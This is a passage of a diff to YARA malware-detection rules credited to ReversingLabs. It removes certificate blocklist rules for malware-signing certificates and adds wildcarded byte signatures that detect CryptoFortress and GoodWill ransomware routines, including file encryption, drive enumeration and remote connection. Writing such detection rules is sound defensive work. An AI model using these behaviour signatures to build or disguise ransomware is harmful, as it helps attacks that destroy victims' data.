?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 8D ?? ?? ?? + ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? + ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? + 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? + 51 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? + 8B E5 5D C3 + } + $remote_connection = { + 55 8B EC 81 EC ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A + ?? FF 15 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 83 F9 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 81 C2 ?? ?? ?? ?? 52 8D 95 ?? ?? ?? ?? + 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D + ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? + ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? ?? + ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7F ?? 8D 85 ?? ?? ?? ?? 50 8B + 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 + ?? EB ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Unique Digital Services Ltd." and (pe.signatures[i].serial=="00:66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" or pe.signatures[i].serial=="66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7") and 1594942800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_51Aead5A9Ab2D841B449Fa82De3A8A00 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cryptofortress : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects CryptoFortress ransomware." author = "ReversingLabs" - id = "c4909945-f2f1-53b2-b438-edf411fda7ed" - date = "2023-11-08" - modified = "2023-11-08" + id = "460289b1-f775-5e0b-8c44-4f6e5c92da60" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4950-L4966" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e53095aab9d6c2745125e8cd933334ebc2e51a9725714d31a46baa74b8e42ed9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.CryptoFortress.yara#L1-L162" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "474893b63523de5ff9eb8a0c91b0677b99ce65056af7f5d02a73e43fa65453c9" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "CryptoFortress" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Corsair Software Solution Inc." and pe.signatures[i].serial=="51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" and 1501577475<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_03B630F9645531F8868Dae8Ac0F8Cfe6 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "be945687-9b8c-5d84-9992-fd317eddae54" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4968-L4984" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6d2f4346760bf52a438c4c996e92a2641bebfd536248776383d7c8394e094e6a" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $enum_drives = { + 55 8B EC 83 C4 ?? 56 57 C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 8D 7D ?? B2 ?? B9 ?? ?? ?? ?? A9 ?? ?? ?? ?? 74 ?? 88 17 47 D1 E8 FE C2 49 + 75 ?? C6 07 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F8 8D 75 ?? 8A 16 88 55 ?? 8D 45 ?? 50 + FF 15 ?? ?? ?? ?? 8D 55 ?? C6 42 ?? ?? 83 F8 ?? 75 ?? 60 8D 45 ?? 50 8D 45 ?? 50 6A + ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? + 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 61 46 4F 75 ?? A1 ?? ?? ?? ?? A3 + ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 5F 5E C9 C3 + } + $enum_shared_resources = { + 55 8B EC 83 C4 ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 0B C0 0F + 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 8D 45 ?? 50 FF 75 ?? FF 15 + ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 3D ?? ?? ?? ?? 74 ?? 8B 4D ?? 51 8D 49 ?? 6B C9 ?? 8B + 45 ?? 8D 0C 01 6A ?? 51 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? FF 75 ?? E8 ?? + ?? ?? ?? 83 F8 ?? 76 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 0B C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 49 75 ?? EB + ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF + 15 ?? ?? ?? ?? C9 C2 + } + $find_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 40 0F 84 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? C6 00 ?? 2B 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 8D ?? ?? ?? ?? C7 04 08 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 8B 8D ?? ?? ?? ?? C7 44 08 ?? + ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 45 ?? + 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 49 8B 1D ?? ?? ?? ?? 51 53 + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 + 83 C3 ?? 59 E2 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 0B + C9 75 ?? 3B D0 72 ?? EB ?? EB ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C9 C3 + } + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 33 C0 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 + 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? FF 35 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 45 ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 50 50 6A ?? 50 6A ?? 68 ?? ?? ?? ?? + FF 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 45 + ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? + 83 7D ?? ?? 75 ?? 83 7D ?? ?? 73 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B D2 75 ?? 0B C9 75 ?? B9 ?? ?? ?? ?? 89 4D ?? 89 55 ?? + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 89 55 ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 4D ?? 89 55 ?? 0B DB 75 ?? 0B C0 74 ?? 83 45 ?? ?? 83 55 ?? ?? FF 75 ?? + FF 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? + ?? ?? 76 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 6B C0 ?? 89 45 ?? 6A ?? 8D 45 ?? 50 FF 75 + ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? + 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? + ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF + 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? DF 6D ?? DA 45 + ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF 6D ?? DA 65 ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF + 6D ?? DA 65 ?? DF 7D ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 8F 45 ?? + 8F 45 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? + ?? ?? 0B C0 74 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? + ?? 0B C0 75 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? + ?? 0B C0 75 ?? EB ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? + ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? + 50 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B C9 C2 + } + $read_config_file = { + 55 8B EC 83 C4 ?? [0-20] 6A ?? 68 ?? ?? ?? ?? 6A + ?? (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 ?? 33 C0 C9 + C3 89 45 ?? 50 6A ?? (E8 | FF 15) ?? ?? ?? ?? 0B + C0 75 04 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? + (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 + 89 45 ?? 50 (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 + 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? (E8 | FF 15) + ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 8B + D8 FF 75 ?? FF 75 ?? FF 75 ?? (E8 | FF 15) ?? ?? + ?? ?? FF 75 ?? (E8 | FF 15) ?? ?? ?? ?? 8B 5D ?? + 6A ?? 53 68 ?? ?? ?? ?? (E8 | FF 15) ?? ?? ?? ?? + 83 C3 ?? 8B 45 ?? 83 (E8 | FF 15) ?? 50 53 + (E8 | FF 15) ?? ?? ?? ?? 8A 03 A2 ?? ?? ?? ?? 83 + C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3 + } + $file_type_loop = { + 51 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 + ?? 75 03 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 83 C3 + ?? 59 E2 DC [20-40] FF B5 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 0B C0 75 44 FF B5 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 + } + $encrypt_routine = { + FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? + [0-10] E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? + FF (35 | 75) [1-4] FF 75 ?? (E8 | FF 15) + ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 68 ?? + ?? ?? ?? [1-10] FF (35 | 75) [1-4] 6A ?? + 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) ?? + ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ?? + [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 + ?? 75 ?? [10-40] FF (35 | 75) [1-4] FF 75 ?? + (E8 |FF 15) + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Geksan LLC" and pe.signatures[i].serial=="03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" and 1594252801<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($read_config_file and $file_type_loop and $encrypt_routine) or ($enum_drives and $enum_shared_resources and $find_files and $encrypt_files)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6F8373Cf89F1B49138F4328118487F9E : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Goodwill : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GoodWill ransomware." author = "ReversingLabs" - id = "80c5d205-7f5e-5e06-b490-f33205154974" - date = "2023-11-08" - modified = "2023-11-08" + id = "66358802-450b-5276-8088-b3550519b1e8" + date = "2022-06-28" + modified = "2022-06-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4986-L5002" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f926c2f73d47d463721a0cad48d9866192df55d71867941a40cba7e0b7725102" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.GoodWill.yara#L1-L89" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "94e2950f415ba737fe5ca9d32a3d850dd5744e547c4ca094ad28545e19033cb2" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GoodWill" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "30 PTY LTD" and pe.signatures[i].serial=="6f:83:73:cf:89:f1:b4:91:38:f4:32:81:18:48:7f:9e" and 1572566400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_E38259Cf24Cc702Ce441B683Ad578911 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "fc5df86f-b8c9-58b1-bd41-e03ed50829dd" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5004-L5022" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2428df14a18f4aed1a3db85c1fb43a847fae8a922c6dc948f3bc514dc4cae09c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_file = { + 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F + ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 07 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 26 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A + } + $aes_encrypt = { + 14 0A 03 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? + ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? + ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? + 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? + ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? + ?? ?? ?? DC 06 2A + } + $find_files_p1 = { + 28 ?? ?? ?? ?? 0A 1F ?? 28 ?? ?? ?? ?? 0B 18 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 + 17 72 ?? ?? ?? ?? A2 0C 06 0D 16 13 ?? 38 ?? ?? ?? ?? 09 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? + ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 + ?? 28 ?? ?? ?? ?? 08 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? + ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? + ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? + ?? DC DE ?? 26 DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? + ?? ?? ?? DC 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? + 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? + ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? 